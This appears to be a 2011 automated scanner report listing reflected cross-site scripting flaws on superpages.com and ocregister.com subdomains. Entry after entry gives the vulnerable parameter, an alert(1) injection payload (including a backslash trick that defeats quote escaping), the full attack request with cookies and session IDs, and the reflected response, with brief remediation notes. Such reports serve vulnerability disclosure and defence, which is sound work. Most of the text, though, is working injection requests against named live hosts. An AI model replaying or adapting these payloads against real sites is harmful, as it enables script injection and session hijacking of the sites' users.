<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... l="alternate" type="application/rss+xml" title=" Page not found - Letters to the Editor - www.ocregister.com" href="http://letters.ocregister.com/2011/02/02/egyptian-revolution-could-bring-u-s-trouble2b12b\"><script>alert(1)</script>29a0ab24421feed/" /> ...[SNIP]...
The value of the &SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0186"%3balert(1)//4a2e6a0ce5b was submitted in the &SRC parameter. This input was echoed as e0186";alert(1)//4a2e6a0ce5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1ae0186"%3balert(1)//4a2e6a0ce5b&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=0A0D8557B1084404AFE23DD0AF0AF253; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:22:46 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... window.locale = 'en-us'; var token = "RGBdU6R4GBImcYmepJZCuPc-P0ApKvan6CIRb_VBHpv7BOlE5AlS1J65xSZmZSy3C-3K_wv_hUyFJXQWMj1bvQ2";
var spHeader=false; var cobrand="comlocal1ae0186";alert(1)//4a2e6a0ce5b"; var spYPC=""; var spPGID=""; var spOF=""; var spLid=""; var spBid=""; var spCampaignId=""; var spOnAMap=false; var spC="banks"; var TopMostSW=false; var spMS2=false; var spLid2=""; var spBid2=""; va ...[SNIP]...
The value of the &spheader request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b305f"-alert(1)-"5b1a94486f6 was submitted in the &spheader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&spheader=trueb305f"-alert(1)-"5b1a94486f6& HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=78A519C6EB88961EA09FA2CFC9F74D50; __unam=c5114f2-12dec4b1cc4-7f15d273-1; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; s_dfa=superpagescom; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; shopping=; s.campaign=comlocal1a; s_pv=Maps;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=E5BF135AD9937E6B27515B002A95E5A6; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 19:07:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... = null; // TEST: that this is returning what's expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&spheader=trueb305f"-alert(1)-"5b1a94486f6&";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the C request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 415ee"%3balert(1)//7f39f412a8d was submitted in the C parameter. This input was echoed as 415ee";alert(1)//7f39f412a8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks415ee"%3balert(1)//7f39f412a8d&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=C1BB2C6D5F2026531BC42BC6B8F4DFAC; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:22:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... yFJXQWMj1bvQ2";
var spHeader=false; var cobrand="comlocal1a"; var spYPC=""; var spPGID=""; var spOF=""; var spLid=""; var spBid=""; var spCampaignId=""; var spOnAMap=false; var spC="banks415ee";alert(1)//7f39f412a8d"; var TopMostSW=false; var spMS2=false; var spLid2=""; var spBid2=""; var spCampaignId2=""; var singleQuery2=""; var spType2=""; var spOnAMap2=null; var spC2=""; var spZoom=4; var spStyle="r"; var spD ...[SNIP]...
The value of the CS request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5aa7"-alert(1)-"e8f7aa23d76 was submitted in the CS parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7"-alert(1)-"e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=8A6B3D73FBEBC1BA5FD4B23D5F55C05E; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:23:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... this is returning what's expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7"-alert(1)-"e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the L request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbefb"%3balert(1)//638e573e1c7 was submitted in the L parameter. This input was echoed as bbefb";alert(1)//638e573e1c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101bbefb"%3balert(1)//638e573e1c7&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=0455C57151DFDC39EEC6EB920F1CE002; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:23:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... S2=false; var spLid2=""; var spBid2=""; var spCampaignId2=""; var singleQuery2=""; var spType2=""; var spOnAMap2=null; var spC2=""; var spZoom=4; var spStyle="r"; var spDD = false; var spAddress="19101bbefb";alert(1)//638e573e1c7"; var spStartAddress=""; var spTraffic = false; var spBeId = false; var spLat = null; var spLon = null; var spStartLocation = true;
var spc_lat = null; var spc_long = null; ...[SNIP]...
The value of the MCBP request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fed48"-alert(1)-"1cd3186e2fd was submitted in the MCBP parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=truefed48"-alert(1)-"1cd3186e2fd&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=F434BBA89E81451FADCF2C4BAF96B9DD; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:23:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... eturning what's expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=truefed48"-alert(1)-"1cd3186e2fd&C=Banks&STYPE=S&PS=15&search=Find+It";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the PS request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 242c7"-alert(1)-"6e00a234b00 was submitted in the PS parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15242c7"-alert(1)-"6e00a234b00&search=Find+It HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=9139837C423FB41FB7994B9F30753C27; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:24:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... ed var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15242c7"-alert(1)-"6e00a234b00&search=Find+It";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e454"%3balert(1)//a5898f77f83 was submitted in the SRC parameter. This input was echoed as 1e454";alert(1)//a5898f77f83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&spheader=true&L=&SRC=bpo1e454"%3balert(1)//a5898f77f83 HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=78A519C6EB88961EA09FA2CFC9F74D50; __unam=c5114f2-12dec4b1cc4-7f15d273-1; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; s_dfa=superpagescom; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; shopping=; s.campaign=comlocal1a; s_pv=Maps;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=117A4533D55B610A1C95579E212D0972; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 19:07:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... window.locale = 'en-us'; var token = "p3QTbbHsCs-eeUFhvWJsTUVffL_Ir8TWNCsd-WpPTj7F6jKZTdTbkF_H-pfUpTkqszv1R7ui7FAHG-ONafiS_w2";
var spHeader=true; var cobrand="bpo1e454";alert(1)//a5898f77f83"; var spYPC=""; var spPGID=""; var spOF=""; var spLid=""; var spBid=""; var spCampaignId=""; var spOnAMap=false; var spC=""; var TopMostSW=false; var spMS2=false; var spLid2=""; var spBid2=""; var spC ...[SNIP]...
The value of the STYPE request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bc58"-alert(1)-"d4e5aaa0292 was submitted in the STYPE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S3bc58"-alert(1)-"d4e5aaa0292&PS=15&search=Find+It HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=7AD460510827A183B38F52F6C40DBEE4; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:24:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S3bc58"-alert(1)-"d4e5aaa0292&PS=15&search=Find+It";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
var fbClientId = "133515049997773";
</script> ...[SNIP]...
1.203. http://mapserver.superpages.com/mapbasedsearch/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mapserver.superpages.com
Path: /mapbasedsearch/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 486fb"-alert(1)-"cf09a8c6088 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?486fb"-alert(1)-"cf09a8c6088=1 HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=F0CC14DC558B2EE853A42B486D028978; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:23:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... var spc_long = null; // TEST: that this is returning what's expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?486fb"-alert(1)-"cf09a8c6088=1";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the search request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9334"-alert(1)-"340f60da8f8 was submitted in the search parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+Itc9334"-alert(1)-"340f60da8f8 HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=48CA725AE0BF7A03BE6E941C2CF30885; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:24:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... ferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+Itc9334"-alert(1)-"340f60da8f8";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the spheader request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9124c"-alert(1)-"2c2736523e0 was submitted in the spheader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?spheader=true9124c"-alert(1)-"2c2736523e0&L= HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=78A519C6EB88961EA09FA2CFC9F74D50; __unam=c5114f2-12dec4b1cc4-7f15d273-1; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; s_dfa=superpagescom; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; shopping=; s.campaign=comlocal1a; s_pv=Maps;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=762E206D0334242828CD0BC99ACC410B; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 19:07:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... = null; // TEST: that this is returning what's expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?spheader=true9124c"-alert(1)-"2c2736523e0&L=";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the FP request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bf14\'%3balert(1)//32bd7f650df was submitted in the FP parameter. This input was echoed as 5bf14\\';alert(1)//32bd7f650df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
The value of the a request parameter is copied into the HTML document as plain text between tags. The payload f2f57<script>alert(1)</script>151fa128c48 was submitted in the a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Unspecified Content-Length: 637 Date: Thu, 03 Feb 2011 18:57:38 GMT
SP_SearchManager._ApplyResults(1,0,[],[],false,"<div class=message>No 'banksf2f57<script>alert(1)</script>151fa128c48' found on this map.<br><br><div class=solution>Try these solutions<br><br><span cl ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81705"><script>alert(1)</script>5be155ad2e1 was submitted in the cat parameter. This input was echoed as 81705\"><script>alert(1)</script>5be155ad2e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?cat=81705"><script>alert(1)</script>5be155ad2e1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:08:57 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:08:57 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62649
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/?cat=81705\"><script>alert(1)</script>5be155ad2e1feed/" /> ...[SNIP]...
1.209. http://mortgage.ocregister.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9060"><script>alert(1)</script>27ab659d801 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9060\"><script>alert(1)</script>27ab659d801 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d9060"><script>alert(1)</script>27ab659d801=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:08:35 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 99645
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52dcb"><script>alert(1)</script>39ced908d26 was submitted in the REST URL parameter 1. This input was echoed as 52dcb\"><script>alert(1)</script>39ced908d26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200752dcb"><script>alert(1)</script>39ced908d26/02/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:55 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:55 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
